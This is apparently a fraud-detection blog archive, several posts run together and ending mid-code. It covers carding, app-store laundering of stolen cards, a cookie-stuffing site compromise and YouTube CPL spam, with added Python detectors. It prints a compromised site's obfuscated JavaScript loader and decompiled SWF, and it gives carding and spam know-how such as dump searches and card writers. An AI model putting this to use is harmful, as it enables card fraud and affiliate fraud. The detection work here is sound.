Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.

Cards

I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers who feel nothing flaunting their illegal services in full view of authorities and anyone that really cares to take a look.

Pastebin.com is a surprising resource here. Point your browser to your favorite search engine and type in the following query:

“cvv site:pastebin.com”

The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, PayPal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

Region         Card type          Average price
United States  American Express   $7.00
United States  Discover           $8.00
United States  Visa & Mastercard  $4.50
Europe         American Express   $12.50
Europe         Discover           $18.00
Europe         Visa & Mastercard  $14.50
Asia           American Express   $18.00
Asia           Discover           $18.00
Asia           Visa & Mastercard  $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often does one hear about ‘data breach here’ and ‘millions of accounts compromised there’ but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase? An entry-level scammer may interrupt now and say that you don’t deliver them to yourself, because the goal is to launder the card as quickly as you can and make a clean getaway. One way to do this is to sell items at a discount on online market A; once these sell, you buy the product through online market B with the stolen card and ship it to the buyer from market A. Easy.

It’s a simple scam, but scammers are lazy and this sounds like too much work, mostly in the sense that it takes so long to make it all happen. Money would only slowly trickle in, and by the time it starts producing any meaningful income the account on A could get closed at any time (the buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it’s surprisingly easier to get up to speed here than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605”) yield a list of auctions with card writers that are ready to roll for less than $150.

[images: eBay listings for MSR605 card writers]

Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy; it is stored on the magnetic stripe of your card.

[image: credit card track 2 data]
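The same track data that a writer pushes onto a blank card is what turns up verbatim in the Pastebin dumps mentioned earlier, so a defender’s first tool here is a scanner that recognises it in arbitrary text (pastes, log files, ticket attachments). The following Python is an added example written for this edit, not code from the original post: it flags track-2-formatted records and bare card numbers using the Luhn check and redacts them. The sample paste is constructed around the standard 4111… test number; the expiry, service code and discretionary data in it are made up.

```python
import re

# Constructed sample paste (not from the page): one Luhn-valid test PAN in
# track-2 layout, the same PAN written with spaces, and a 16-digit order id
# that fails the Luhn check. Expiry, service code and discretionary data are made up.
SAMPLE_PASTE = """\
dump #1 ;4111111111111111=25121011234500000000?
card 4111 1111 1111 1111 exp 12/25
order id 1234567890123456 (not a card)
"""

# Track 2 as stored on the stripe: ';' start sentinel, PAN, '=' separator,
# YYMM expiry, 3-digit service code, discretionary data, '?' end sentinel.
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")
# A bare 13-19 digit PAN, optionally grouped with spaces or dashes.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check digit (ISO/IEC 7812): double every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_card_data(text: str) -> list[dict]:
    """Return track-2 records and bare PANs that pass Luhn, with their spans."""
    findings = []
    for m in TRACK2_RE.finditer(text):
        pan, expiry, service, _disc = m.groups()
        if luhn_ok(pan):
            findings.append({"kind": "track2", "pan": pan, "expiry": expiry,
                             "service_code": service, "span": m.span()})
    for m in PAN_RE.finditer(text):
        pan = re.sub(r"[ -]", "", m.group(0))
        # a PAN that sits inside an already-reported track record is not a second hit
        inside_track = any(f["span"][0] <= m.start() < f["span"][1] for f in findings)
        if luhn_ok(pan) and not inside_track:
            findings.append({"kind": "pan", "pan": pan, "span": m.span()})
    return findings


def redact(text: str, findings: list[dict]) -> str:
    """Mask every digit inside each finding's span, working from the end so
    earlier spans stay valid."""
    for f in sorted(findings, key=lambda f: f["span"][0], reverse=True):
        start, end = f["span"]
        text = text[:start] + re.sub(r"\d", "*", text[start:end]) + text[end:]
    return text


if __name__ == "__main__":
    hits = find_card_data(SAMPLE_PASTE)
    for h in hits:
        print(h["kind"], "****" + h["pan"][-4:], h.get("expiry", ""))
    print(redact(SAMPLE_PASTE, hits))
```

The Luhn check is what keeps the order id on the third line out of the results; without it, any 16-digit number in a log would be a hit. The 20-digit discretionary field after the expiry is never reported as a PAN because the pattern requires the digit run to start and end on its own.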

A scammer that is printing his/her own cards can then purchase fairly expensive and hard-to-track items from offline stores (jewelry), which can then be sold at a discounted rate online. Since the scammer paid nothing for the items purchased, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, and making sure only to purchase hard-to-track items, mitigates the risk of the scammer’s online account responsible for sales being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world that is bound to the same laws of the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

[image: scammer hustle and flow]

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. Scammer will buy goods using a stolen credit and sell them at a discounted price to a buyer through the market. Merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on the weakest links in the ecosystem:

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good’ol wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future”

He’d then present something similar to the following:

[image: scammer hustle and flow 2]

Now, it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying is: why waste time with merchants and legitimate buyers when the enterprising fraudster can be both!

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little, fraudsters can sell something that cost next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app) and the market will happily onboard yet another publisher in their ever increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

Qbnews.cn ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up qbnews.cn results in a request to www.52zhishi.com/v.swf, which is then responsible for requesting www.52zhishi.com/v.asp. The ASP file returns a list of URLs (affiliate clicks included); the Flash payload in the browser then invisibly requests each of the links, and the cookies returned by these lookups result in forced/faked affiliate clicks.

The question now is where the initial request to 52zhishi.com comes from, i.e., what exactly is responsible for it? If you search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you search dynamically (via the DOM) you’re still not going to find it. Babyface is somewhat predictable in that, like many of the self-styled technical marvels among blackhats in this space, he was not the brightest bulb on the ever-shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at http://www.qbnews.cn/statics/js/jquery.min.js and you’ll find what looks to be a jQuery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires...

In compromising this site, he has hidden his activities in this jQuery library. I’ve broken this down with the addition of my own comments (that’s everything after //):

// so what we have here is code that will run every single time 
// qbnews.cn loads on a javascript enabled browser
(function()
{
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
  {
    try
    {
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101) 
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals "http://www.52zhishi.com/v.swf"
      var p=String.fromCharCode(
        104,116,116,112,58,47,47,119,119, 
        119,46,53,50,122,104,105,115,104,
        105,46,99,111,109,47,118,46,115,119,102) 
        + "?i=" + (new Date()).valueOf();
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
        (function()
        {
          if(!c.body)
          {
            setTimeout(arguments.callee,1000)
          }
          else
          {
            c.body.insertBefore(s,c.body.lastChild)
          }
        })()
    }
    catch(e)
    {
    }
  }
})();
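To pull the hidden strings out of a file like this without executing it, an analyst can decode the String.fromCharCode(...) sequences statically. The Python below is an added example, not code from the post or from the compromised site. It goes a little beyond the snippet above: it also decodes runs of \xNN escapes (the other common way to hide a literal), reports any URL that exists only in decoded form, and matches the three tell-tale patterns from the injected code (the cookie gate, string obfuscation, and a 1x1 Flash object). SAMPLE_JS is a constructed excerpt containing the two obfuscated literals and the object injection, not a copy of the full file.

```python
import re

# Constructed excerpt (not a copy of the injected file): the two obfuscated
# literals and the hidden-object injection from the snippet above.
SAMPLE_JS = r"""
(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){
var p=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,53,50,122,104,105,115,104,105,46,99,111,109,47,118,46,115,119,102)+"?i="+(new Date()).valueOf();
s.innerHTML='<object type="application/x-shockwave-flash" data="'+p+'" width="1" height="1">';
}})();
"""

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]+)\)")
HEX_ESCAPES_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){3,}")  # runs of \xNN, 3 or more
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Patterns seen in the injected code. Each is a weak signal on its own;
# together with a URL that only exists after decoding they are a strong one.
INDICATORS = [
    ("cookie_gate", r"document\.cookie\.indexOf\("),
    ("string_obfuscation", r"String\.fromCharCode\(|\\x[0-9a-fA-F]{2}"),
    ("hidden_flash_object", r'x-shockwave-flash[^>]*width="1"\s*height="1"'),
]


def decode_fromcharcode(js: str) -> list[str]:
    """Decode every String.fromCharCode(n, n, ...) call without evaluating the script."""
    out = []
    for m in FROMCHARCODE_RE.finditer(js):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        out.append("".join(chr(c) for c in codes))
    return out


def decode_hex_escapes(js: str) -> list[str]:
    """Decode runs of \\xNN escapes into text."""
    return [m.group(0).encode("ascii").decode("unicode_escape")
            for m in HEX_ESCAPES_RE.finditer(js)]


def audit(js: str) -> dict:
    """Decoded literals, URLs that were deliberately hidden, and matched indicators."""
    decoded = decode_fromcharcode(js) + decode_hex_escapes(js)
    # A URL that appears only after decoding was not meant to be found by grep.
    hidden_urls = [u for s in decoded for u in URL_RE.findall(s) if u not in js]
    indicators = [name for name, pat in INDICATORS if re.search(pat, js)]
    return {"decoded": decoded, "hidden_urls": hidden_urls, "indicators": indicators}


if __name__ == "__main__":
    for key, value in audit(SAMPLE_JS).items():
        print(key, value)
```

Run against the real jquery.min.js, the same audit would also be worth pairing with a hash comparison against the upstream release of the same jQuery version; any decoded URL in a library file is a finding regardless of what it points at.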

So the JavaScript above answers our earlier question of what is responsible for the request to 52zhishi.com. The SWF loaded as a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.events.*;
    import flash.display.*;
    import flash.net.*;
    import flash.system.*;
    public dynamic class MainTimeline extends MovieClip {

        public var loader:URLLoader;
        public var url:String;
        public var reqURL:URLRequest;

        public function MainTimeline(){
            addFrameScript(0, frame1);
        }
        function frame1(){
            Security.allowDomain("*");
            url = "http://www.52zhishi.com/v.asp";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = NaN;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(event.target);
            safe = new Number(loader.data["safe"]);
            url1 = new String(loader.data["url1"]);
            url2 = new String(loader.data["url2"]);
            url3 = new String(loader.data["url3"]);
            url4 = new String(loader.data["url4"]);
            url5 = new String(loader.data["url5"]);
            url6 = new String(loader.data["url6"]);
            url7 = new String(loader.data["url7"]);
            url8 = new String(loader.data["url8"]);
            url9 = new String(loader.data["url9"]);
            url10 = new String(loader.data["url10"]);
            url11 = new String(loader.data["url11"]);
            url12 = new String(loader.data["url12"]);
            url13 = new String(loader.data["url13"]);
            url14 = new String(loader.data["url14"]);
            url15 = new String(loader.data["url15"]);
            url16 = new String(loader.data["url16"]);
            url17 = new String(loader.data["url17"]);
            url18 = new String(loader.data["url18"]);
            url19 = new String(loader.data["url19"]);
            url20 = new String(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                    sendToURL(request1);
                    sendToURL(request2);
                    sendToURL(request3);
                    sendToURL(request4);
                    sendToURL(request5);
                    sendToURL(request6);
                    sendToURL(request7);
                    sendToURL(request8);
                    sendToURL(request9);
                    sendToURL(request10);
                    sendToURL(request11);
                    sendToURL(request12);
                    sendToURL(request13);
                    sendToURL(request14);
                    sendToURL(request15);
                    sendToURL(request16);
                    sendToURL(request17);
                    sendToURL(request18);
                    sendToURL(request19);
                    sendToURL(request20);
                } catch(e:Error) {
                };
            };
        }
    }

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middle men in these transactions for they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser.

[image: world of tanks affiliate fraud]

Note the following:

  • Commission rate of “$2.65”/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from the USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates cannot encourage consumers to sign up with the advertiser by offering rewards such as cash or points in some program

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):
[image: world-of-tanks-2]

Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in the USA or Canada who sign up using the link provided. This is a packet trace of me following the link in my browser; the screenshot below shows the result.

[image: world of tanks affiliate fraud]

This is what’s going on in the packet trace:

  1. A subscriber in the online forum decides he wants the $0.40 on offer in the online forum
  2. He/she starts the task by navigating to http://tinyurl.com/olghhz7
  3. Tinyurl redirects to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154, which then uses JavaScript and an HTML form to redirect the browser to http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ (this essentially launders the referrer)
  4. http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/ sets up a full-screen iframe containing www.mb57.com, which redirects to the following affiliate click URL: www.maxbounty.com/lnk.asp?o=5572&c=63867&a=105565&s1=tanks
  5. This URL redirects to track.popmog.com, which redirects to worldoftanks.com

So what you have here is an affiliate taking advantage of a price difference between two markets. Of course, one of these markets is of his own creation, but essentially this is arbitrage (pay $0.40, sell for $2.65) and a bad deal for Worldoftanks (the poor advertiser that bankrolls this operation).
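A packet trace like the one above reduces to a handful of questions an affiliate manager actually cares about: what did the browser hop through, which hops were client-side (script, form or frame) rather than HTTP redirects, and whether the true traffic source is ever visible to the network or the advertiser in a Referer header. The Python below is an added example, not the post’s own tooling. TRACE is a constructed record of the chain described in steps 1 to 5; the forum host (forum.example), the 301 for tinyurl and the track.popmog.com path are made up because the post does not give them.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed trace of the chain in steps 1-5 (not the post's own capture):
# one record per request in order, with the response status, its Location
# header (None if not a redirect) and the Referer the browser sent.
# forum.example, the 301 for tinyurl and the track.popmog.com path are made up.
TRACE = [
    {"url": "http://tinyurl.com/olghhz7", "status": 301,
     "location": "http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154",
     "referer": "http://forum.example/tasks/1154"},
    {"url": "http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154",
     "status": 200, "location": None,
     "referer": "http://forum.example/tasks/1154"},
    # step 3: JavaScript + form submit, not an HTTP redirect
    {"url": "http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/",
     "status": 200, "location": None,
     "referer": "http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/?mn=1154"},
    # step 4: loaded inside the full-screen iframe
    {"url": "http://www.mb57.com/", "status": 302,
     "location": "http://www.maxbounty.com/lnk.asp?o=5572&c=63867&a=105565&s1=tanks",
     "referer": "http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/"},
    {"url": "http://www.maxbounty.com/lnk.asp?o=5572&c=63867&a=105565&s1=tanks",
     "status": 302, "location": "http://track.popmog.com/",
     "referer": "http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/"},
    {"url": "http://track.popmog.com/", "status": 302,
     "location": "http://worldoftanks.com/",
     "referer": "http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/"},
    {"url": "http://worldoftanks.com/", "status": 200, "location": None,
     "referer": "http://macgoodiebag.jncbusinesscreations.com/world-of-tanks/"},
]


def host(url):
    return urlsplit(url).hostname if url else None


def hop_hosts(trace):
    return [host(r["url"]) for r in trace]


def true_origin(trace):
    """Where the visitor really came from: the Referer on the very first request."""
    return host(trace[0]["referer"])


def client_side_hops(trace):
    """Indices of requests not reached through the previous response's Location
    header, i.e. navigation driven by script, form or frame. These are the
    points where the Referer chain gets rewritten."""
    return [i for i in range(1, len(trace))
            if trace[i - 1]["location"] != trace[i]["url"]]


def origin_visible_to(trace, target_host):
    """Does any request to target_host carry the true origin in its Referer?"""
    origin = true_origin(trace)
    return any(host(r["referer"]) == origin
               for r in trace if host(r["url"]) == target_host)


def affiliate_click(trace):
    """Parameters of the MaxBounty click (lnk.asp) if the chain passes through one."""
    for r in trace:
        parts = urlsplit(r["url"])
        if parts.hostname == "www.maxbounty.com" and parts.path.endswith("/lnk.asp"):
            return {k: v[0] for k, v in parse_qs(parts.query).items()}
    return None


def report(trace):
    return {
        "hops": hop_hosts(trace),
        "true_origin": true_origin(trace),
        "client_side_hops": client_side_hops(trace),
        "origin_seen_by_network": origin_visible_to(trace, "www.maxbounty.com"),
        "origin_seen_by_advertiser": origin_visible_to(trace, "worldoftanks.com"),
        "affiliate_click": affiliate_click(trace),
    }


if __name__ == "__main__":
    for key, value in report(TRACE).items():
        print(f"{key}: {value}")
```

The two client-side hops (indices 2 and 3) are exactly the JavaScript/form redirect and the iframe from steps 3 and 4, and neither MaxBounty nor worldoftanks.com ever sees forum.example in a Referer, which is the laundering the post describes. A network that logs the Referer on lnk.asp and compares it with where the affiliate claims the traffic comes from has a concrete signal to act on.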

YouTube Spam

By Wesley Brandi in CPL | Spam

Spend some time on YouTube and you may run into comments like

Make money working from home, get paid $$$ to fill in surveys. Go here…

Needless to say, the comments bring no value to the context of the video that you may be watching. More often than not it is exactly the same comment over and over, i.e., it’s YouTube Spam.

In this post, we try to answer the following :

  • How big of a problem is this spam for YouTube?
  • How do the spammers monetize?
  • What tools & tricks are employed by the spammers?

Scope of the Problem

If we were on the backend of YouTube, we could take a naive approach to appreciating this problem:

“These are all our videos (N). Each video may be connected to a set of tainted comments (T); we consider a set of comments to be tainted when it contains spam. Having defined a function to determine if a set is tainted, we then get an idea of the scope of this problem by dividing the number of tainted videos (T) by N.”

Of course, it doesn’t take into account the rank of each spammy comment, but that’s why this is called a naive approach.

Now we’re not on the backend of YouTube, but we are privy to the very front end of YouTube. In fact, we can get a rough idea of how much of a problem this is by looking only at the default page presented when visiting youtube.com. This approach should work well for us because

  • it’s a whole lot smaller than N above, so it’s reproducible for the folks at home
  • it’s a page with massive traffic so will have massive attention from the spammers
  • it’s a page with massive traffic so will have massive attention from the YouTube abuse team

The following YouTube page was loaded at approximately 5pm on 8/5/2013

[image: youtube spam sample set]

There are 40 videos presented on the front page. If you’re going to try this for yourself at home, you need to click on each of the videos and scroll down into the comments. Fortunately (or not), you don’t have to scroll very far, because the spammers have a knack for having their comments placed right at the top. What you’re looking for is something like this:

[image: youtube spam comment]

For this particular sample set, we were quite surprised to find that 9 of the 40 videos had tainted comments:

[image: youtube spam]

Now 22.5% of the front page videos having tainted comments may not sound like an awful lot, but when you consider that this is for the third most popular page on earth (Alexa Rank #3), then what’s going on here starts to take on a whole new perspective.

Monetization Path

So what’s really going on here?

At the very least, we know that spammers are targeting a significant percentage of the videos on YouTube’s front page. Of course, they’re not doing this for their health so how do they make their money?

Consider the comment on the first highlighted video presented:

[image: youtube_spam_comment_1]

This is how i am making tons of money every single month working at my house..

Step 1: Follow the guide on this page: goo.gl\nb1Bak

Step 2: Get paid 5-20 bucks to answer each survey

Step 3: Retire and move overseas

This is a packet trace of the network activity on a machine when you browse goo.gl/nb1Bak in a browser:

  • goo.gl is Google’s URL Shortener.
  • goo.gl/nb1Bak redirects to 78.154.146.129/~leechtv/paidsurveys/?7, which redirects to trk.surveyjunkie.com/srd/klenzxcp
  • This then redirects to www.surveyjunkie.com

“So surveyjunkie.com is the spammer?”

No, surveyjunkie.com is not the spammer. Surveyjunkie is an advertiser in a Cost Per Lead (CPL) advertising model. They have an affiliate program which rewards affiliates when users sign up (leads). The spammer in this scenario is one of surveyjunkie’s affiliates (specifically ‘klenzxcp’); he is paid a finder’s fee when YouTube users sign up with surveyjunkie.com.

Now this may or may not violate surveyjunkie’s acceptable-use terms, although I could not find a policy detailing them. Of interest from the packet trace is that the Web request through to trk.surveyjunkie.com does not contain a Referer header, so surveyjunkie does not get to know where the traffic comes from. So they won’t know that it’s YouTube spam. One could argue that they choose not to know, but who is going to argue that?

“Okay but this is just a once off, you’ve only analyzed one comment”

Actually we analyzed all outbound links on all of the tainted comments. In this case all roads lead to surveyjunkie.com via two affiliates (klenzxcp and gqrzv5sx):

[image: youtube spam leads to surveyjunkie]

Modus Operandi

Obviously the spammers are capitalizing on a great source of traffic. You could argue that the traffic is free, but you would be wrong. The traffic is pretty cheap, but it’s not free. If you were going to pull this off yourself as a spammer new to the scene, then you’d need a couple of things:

  • A set of accounts to post the initial spam as a comment (A). Any spammer worth his weight will suggest using Phone Verified Accounts. You could set these up yourself or you could buy 10 for $5

[image: youtube pva accounts]

  • A set of accounts (B) to thumbs up the comments posted by set A. This is how the spammers get to the top of the comments section. For each comment posted by A, a group of approvers from B will come along and give it a thumbs up, which will quickly push it to the top. Naturally the size of B must be greater than the size of A. You can buy 100 regular (non-PVA) YouTube accounts for $5

[image: buy youtube accounts]

  • The tricky part is writing a tool that will monitor the front page of YouTube and post comments (with approval from set B) on each of the videos that have not yet been targeted. Not too difficult if you have Compsci 101 behind you (or even just a few weeks fiddling with Python/Java/.Net…). You won’t have to write it yourself though, because there are plenty of bots that already do this for you (with captcha support!). Expect to spend anywhere from $50 to $150.

The costs above are not where it ends. If you refresh a video with tainted comments for a while, you will notice that the tainted comment does eventually disappear (feedback from the community marks it as bad). Of course, sit a little while longer and the tainted comment will return. So as much as the YouTube abuse team is fighting the spammers back, the spammers are constantly increasing the size of set A and B.

“It’s all out war out there! What’s an abuse team to do?”

This is not a trivial problem to solve. What surprised me the most from analyzing YouTube spam comments, is that the same comment after being taken down will quickly make its way back to the top. I’d make a bet that there’s low hanging fruit to be had here by combining user feedback on tainted comments with a unique hash on the comment itself. In doing so one could block the comment at the front door.

“Yeah right, the spammers will then simply diversify each comment enough to avoid whatever filter is put in place”

Sure. The trick here is then to get to the root of the problem and really put a dent in their armour: identify outbound CPL links.
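Two points above lend themselves to one worked example: the tainted-videos-over-all-videos estimate from the Scope section, and the suggestion here to combine community feedback with a hash of the comment and to identify outbound CPL links. The Python below is an added example written for this edit, not YouTube’s or the author’s code. It normalises a comment (case, punctuation, whitespace, digits and the link itself are collapsed) before hashing, so the diversified variants the skeptic predicts still collide; it extracts outbound links and resolves the shortener through SHORTENER_MAP, a constructed stand-in for a live lookup that maps goo.gl/nb1Bak to the trk.surveyjunkie.com landing from the packet trace above. SPAM_A, SPAM_B, BENIGN and FRONT_PAGE (40 videos, 9 carrying spam) are constructed samples.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Constructed samples (not scraped): two variants of the spam quoted above that
# differ in case, punctuation, spacing, the payout numbers and how the link is
# written (slash vs backslash), plus a benign comment.
SPAM_A = ("This is how i am making tons of money every single month working at my house.. "
          "Step 1: Follow the guide on this page: goo.gl/nb1Bak "
          "Step 2: Get paid 5-20 bucks to answer each survey")
SPAM_B = (r"THIS is how i am making TONS of money every single month working at my house!!! "
          r"Step 1: Follow the guide on this page: goo.gl\nb1Bak   "
          r"Step 2: Get paid 10-30 bucks to answer each survey")
BENIGN = "Great video, the part at 2:15 made my day."

# Constructed stand-in for resolving the shortener live: maps the short link
# to the trk.surveyjunkie.com landing seen in the packet trace.
SHORTENER_MAP = {"goo.gl/nb1Bak": "http://trk.surveyjunkie.com/srd/klenzxcp"}
CPL_TRACKING_HOSTS = {"trk.surveyjunkie.com"}

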